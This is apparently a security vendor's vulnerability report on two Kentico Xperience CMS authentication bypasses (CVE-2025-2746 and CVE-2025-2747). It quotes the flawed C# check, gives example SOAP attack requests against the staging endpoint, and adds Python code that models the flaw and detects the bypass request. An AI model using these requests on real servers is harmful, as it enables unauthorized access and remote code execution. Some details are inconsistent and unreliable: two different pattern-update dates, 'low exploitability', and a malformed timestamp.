[2025.06 Vulnerability Report] Kentico Xperience CMS Authentication Bypass | SECaaS Platform AIONCLOUD


2025.06 - Kentico Xperience CMS Authentication Bypass

This is an authentication bypass vulnerability in the Kentico Xperience CMS platform: an attacker can attempt to bypass the authentication process by sending crafted SOAP data to the vulnerable endpoint, Staging/SyncServer.asmx.

The vulnerability was patched in Kentico Xperience CMS platform version 13.0.178, and AIWAF responded by adding patterns to detect these vulnerabilities in a May 2025 pattern update.

 

1. Overview

Xperience CMS is Kentico's digital marketing platform, an integrated system that includes content management, digital marketing, e-commerce management, and more.

This report summarizes our analysis of CVE-2025-2746 and CVE-2025-2747, the authentication bypass and RCE vulnerabilities recently discovered in the platform.

(Image omitted)

Source : https://en.wikipedia.org/wiki/Kentico_Xperience

 

2. Attack type

CVE-2025-2746 is an authentication bypass vulnerability rooted in the flawed authentication handling of certain endpoints in Kentico's Xperience CMS platform. According to watchTowr, who analyzed the vulnerability, an attacker can attempt to bypass the authentication process by sending crafted SOAP data to the vulnerable endpoint, Staging/SyncServer.asmx, exploiting the fact that the authentication code returns the password hash as an empty string when a username other than the configured one is supplied.

protected override string AuthenticateToken(UsernameToken token)
{
    if (token == null)
    {
        throw new ArgumentNullException("[WebServiceAuthorization.AuthenticateToken]: Missing username authentication token.");
    }
    AbstractStockHelper<RequestStockHelper>.Add("AUTH_PROCESSED", true, false);
    // Staging username and (decrypted) staging password configured for the current site
    string value = SettingsKeyInfoProvider.GetValue(SiteContext.CurrentSiteName + ".CMSStagingServiceUsername");
    string text = EncryptionHelper.DecryptData(SettingsKeyInfoProvider.GetValue(SiteContext.CurrentSiteName + ".CMSStagingServicePassword"));
    if (string.IsNullOrEmpty(text))
    {
        throw new SecurityException("[WebServiceAuthorization.AuthenticateToken]: Staging does not work with blank password. Set a password on the target server.");
    }
    if (value == token.Username)
    {
        // Known username: the SHA1 hash of the password is what the digest check is computed against
        return StagingTaskRunner.GetSHA1Hash(text);
    }
    // Any other username: an empty string is returned instead of failing,
    // so the caller's digest comparison is carried out against "" (the flaw behind CVE-2025-2746)
    return "";
}

Source : https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/

 

An attacker can therefore bypass the authentication process by selecting the hash-based (PasswordDigest) verification mode and sending a SOAP request whose SHA1 digest is computed over an empty-string password; once authenticated this way, the internal API reachable after authentication can be used to attempt an RCE attack.
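To make the flaw in AuthenticateToken concrete, the following Python model is added here; it is not Kentico's code and not taken from the watchTowr write-up. It reproduces the lookup behaviour shown above beside a hardened variant and runs the standard WS-Security PasswordDigest check against both. The configured username and password, the nonce, the timestamp and the hardened lookup are assumptions for illustration; the digest formula Base64(SHA1(nonce + created + password)) is the one the UsernameToken profile defines, with the server-side "password" being the SHA1 hash string the lookup returns.

```python
import base64
import hashlib
import hmac

# Constructed stand-in for the server's staging settings (CMSStagingServiceUsername /
# CMSStagingServicePassword on the page); these are not real Kentico values.
STAGING_USERNAME = "staging-user"
STAGING_PASSWORD = "correct horse battery staple"


def sha1_hex(s: str) -> str:
    return hashlib.sha1(s.encode("utf-8")).hexdigest()


def authenticate_token_vulnerable(username: str) -> str:
    """Mirrors the page's AuthenticateToken: the SHA1 hash of the configured password
    for the configured username, and an EMPTY STRING for any other username."""
    if not STAGING_PASSWORD:
        raise PermissionError("staging does not work with a blank password")
    if username == STAGING_USERNAME:
        return sha1_hex(STAGING_PASSWORD)
    return ""


def authenticate_token_fixed(username: str) -> str:
    """Hardened variant (an assumption, not Kentico's actual patch): an unknown username
    is an authentication failure, so no secret is ever handed to the digest comparison."""
    if not STAGING_PASSWORD:
        raise PermissionError("staging does not work with a blank password")
    if username != STAGING_USERNAME:
        raise PermissionError("unknown staging username")
    return sha1_hex(STAGING_PASSWORD)


def password_digest(nonce_b64: str, created: str, secret: str) -> str:
    """WS-Security UsernameToken PasswordDigest = Base64(SHA1(nonce + created + password))."""
    raw = base64.b64decode(nonce_b64) + created.encode("utf-8") + secret.encode("utf-8")
    return base64.b64encode(hashlib.sha1(raw).digest()).decode("ascii")


def verify_username_token(token: dict, authenticate_token) -> bool:
    """Digest-mode verification as the WS-Security layer performs it: fetch the secret for
    token['username'] via the supplied lookup, recompute the digest and compare."""
    try:
        secret = authenticate_token(token["username"])
    except PermissionError:
        return False
    expected = password_digest(token["nonce"], token["created"], secret)
    return hmac.compare_digest(expected, token["digest"])


def make_token(username: str, secret: str, nonce_b64: str, created: str) -> dict:
    """The UsernameToken a client sends; 'secret' is what the client believes the
    server-side secret to be."""
    return {"username": username, "nonce": nonce_b64, "created": created,
            "digest": password_digest(nonce_b64, created, secret)}


# Constructed nonce and timestamp, fixed so the outcome is reproducible.
NONCE = base64.b64encode(b"0123456789abcdef").decode("ascii")
CREATED = "2025-05-13T14:54:17Z"


def outcome() -> dict:
    """Runs a legitimate client token and a token for an unknown username (digest computed
    over an empty secret, the CVE-2025-2746 condition) through both lookups."""
    legit = make_token(STAGING_USERNAME, sha1_hex(STAGING_PASSWORD), NONCE, CREATED)
    unknown = make_token("nobody", "", NONCE, CREATED)
    return {
        "legit_vulnerable": verify_username_token(legit, authenticate_token_vulnerable),
        "legit_fixed": verify_username_token(legit, authenticate_token_fixed),
        "unknown_vulnerable": verify_username_token(unknown, authenticate_token_vulnerable),
        "unknown_fixed": verify_username_token(unknown, authenticate_token_fixed),
    }


if __name__ == "__main__":
    for name, accepted in outcome().items():
        print(f"{name}: {'accepted' if accepted else 'rejected'}")
```

The only difference between the two lookups is what happens on a username mismatch: returning "" lets the digest comparison succeed for anyone who computed their digest over an empty string, while raising makes the mismatch terminal. The empty-password guard on the configured password is kept in both, since it is a separate check in the original.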

 

Example attack request:

POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1
Host: www.test.com
Content-Type: text/xml; charset=utf-8
Content-Length: 1095
SOAPAction: "http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData"

<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Header>
    <wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
      <wsse:UsernameToken>
        <wsse:Username>hacker</wsse:Username>
        <wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">OZ/c8o7h3mtigow7HXu0f+BUgLk=</wsse:Password>
        <wsse:Nonce>MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM=</wsse:Nonce>
        <wsu:Created>2025-05-013T014:54:17Z</wsu:Created>
      </wsse:UsernameToken>
    </wsse:Security>
  </soap:Header>
  <soap:Body>
    <ProcessSynchronizationTaskData xmlns="http://localhost/SyncWebService/SyncServer">
      <stagingTaskData><![CDATA[<hacker>]]></stagingTaskData>
    </ProcessSynchronizationTaskData>
  </soap:Body>
</soap:Envelope>

 

CVE-2025-2747 is an authentication bypass vulnerability that gets around the patch for CVE-2025-2746. On a vulnerable version, authentication can be bypassed by sending a SOAP request that carries only a valid username and no password-related tags at all.

 

Example attack request (only the WS-Security header is shown):

POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1
Host: www.test.com
Content-Type: text/xml; charset=utf-8
Content-Length: 1095
SOAPAction: "http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData"

<soap:Header>
  <wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
    <wsse:UsernameToken>
      <wsse:Username>hacker</wsse:Username>
    </wsse:UsernameToken>
  </wsse:Security>
</soap:Header>
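As an added example, not from the page, from Kentico or from AIWAF, the following Python check inspects a captured request to the staging sync endpoint and flags the CVE-2025-2747 request shape (a UsernameToken with no wsse:Password element), plus a digest-mode token missing its Nonce or Created. The host, nonce, digest and task body in the samples are constructed placeholders modelled on the two requests above; the namespaces and endpoint path are the ones the page shows. A CVE-2025-2746 request is structurally a normal digest-mode token, so this check does not flag it; that case needs the server-side patch.

```python
import xml.etree.ElementTree as ET

# Namespaces and endpoint taken from the requests on the page.
WSSE = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
DIGEST_TYPE = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest"
STAGING_SUFFIX = "/staging/syncserver.asmx"


def parse_http_request(raw: str):
    """Minimal parser for a captured request text: (path, headers, body). Assumes '\n' line ends."""
    head, _, body = raw.strip("\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    _method, path, _version = request_line.split()
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return path, headers, body


def inspect_staging_request(raw: str) -> list:
    """Findings for a request aimed at the staging sync endpoint; [] means the WS-Security
    header has the shape a legitimate staging client would send (or it is another endpoint)."""
    path, _headers, body = parse_http_request(raw)
    if not path.lower().split("?")[0].endswith(STAGING_SUFFIX):
        return []
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["staging endpoint: body is not well-formed XML"]
    tokens = root.findall(f".//{{{WSSE}}}UsernameToken")
    if not tokens:
        return ["staging endpoint: no wsse:UsernameToken in Security header"]
    findings = []
    for token in tokens:
        password = token.find(f"{{{WSSE}}}Password")
        if password is None:
            findings.append("staging endpoint: UsernameToken without wsse:Password (CVE-2025-2747 request shape)")
            continue
        if password.get("Type") == DIGEST_TYPE:
            if token.find(f"{{{WSSE}}}Nonce") is None or token.find(f"{{{WSU}}}Created") is None:
                findings.append("staging endpoint: PasswordDigest token missing Nonce or Created")
    return findings


def build_request(username_token_inner: str, path: str = "/CMSPages/Staging/SyncServer.asmx") -> str:
    """Builds a constructed sample request around the given UsernameToken contents."""
    return (
        f"POST {path} HTTP/1.1\n"
        "Host: www.test.com\n"
        "Content-Type: text/xml; charset=utf-8\n"
        'SOAPAction: "http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData"\n'
        "\n"
        '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">\n'
        "  <soap:Header>\n"
        f'    <wsse:Security xmlns:wsse="{WSSE}" xmlns:wsu="{WSU}">\n'
        f"      <wsse:UsernameToken>{username_token_inner}</wsse:UsernameToken>\n"
        "    </wsse:Security>\n"
        "  </soap:Header>\n"
        "  <soap:Body>\n"
        '    <ProcessSynchronizationTaskData xmlns="http://localhost/SyncWebService/SyncServer">\n'
        "      <stagingTaskData><![CDATA[<constructed/>]]></stagingTaskData>\n"
        "    </ProcessSynchronizationTaskData>\n"
        "  </soap:Body>\n"
        "</soap:Envelope>\n"
    )


# Constructed samples: a digest-mode token (the shape of the first request above) and a
# username-only token (the shape of the second request above).
DIGEST_TOKEN = (
    "<wsse:Username>staging-user</wsse:Username>"
    f'<wsse:Password Type="{DIGEST_TYPE}">PLACEHOLDER_DIGEST=</wsse:Password>'
    "<wsse:Nonce>MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM=</wsse:Nonce>"
    "<wsu:Created>2025-05-13T14:54:17Z</wsu:Created>"
)
USERNAME_ONLY_TOKEN = "<wsse:Username>staging-user</wsse:Username>"

REQUEST_WITH_DIGEST = build_request(DIGEST_TOKEN)
REQUEST_USERNAME_ONLY = build_request(USERNAME_ONLY_TOKEN)
REQUEST_OTHER_ENDPOINT = build_request(USERNAME_ONLY_TOKEN, path="/CMSPages/Other.asmx")

if __name__ == "__main__":
    for label, req in [("digest", REQUEST_WITH_DIGEST), ("username-only", REQUEST_USERNAME_ONLY),
                       ("other endpoint", REQUEST_OTHER_ENDPOINT)]:
        print(label, inspect_staging_request(req) or "no findings")
```

The path match is case-insensitive and ignores the query string because the endpoint appears in different casing across the page; the check is deliberately limited to the staging endpoint so that ordinary SOAP traffic elsewhere is not flagged.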

 

3. Mitigation

Kentico has released patches for CVE-2025-2746 and CVE-2025-2747, so users of the platform should check their Xperience version and update to the fixed version or higher.

Our AIWAF product is responding via pattern 2260: Kentico Xperience Authentication Bypass, which is part of the May 2024 pattern update.

(Image omitted)

Source : https://devnet.kentico.com/download/hotfixes#securityBugs-v13

4. Conclusion

Kentico's Xperience CMS platform is an integrated system that includes content management, digital marketing and e-commerce management. The vulnerabilities CVE-2025-2746 and CVE-2025-2747 should be patched to the latest version as soon as possible, given their low exploitability and high impact on the service.

Our AIWAF product has developed a pattern to respond to vulnerabilities in Kentico's products, and we will continue to respond quickly to related vulnerabilities found in the future.
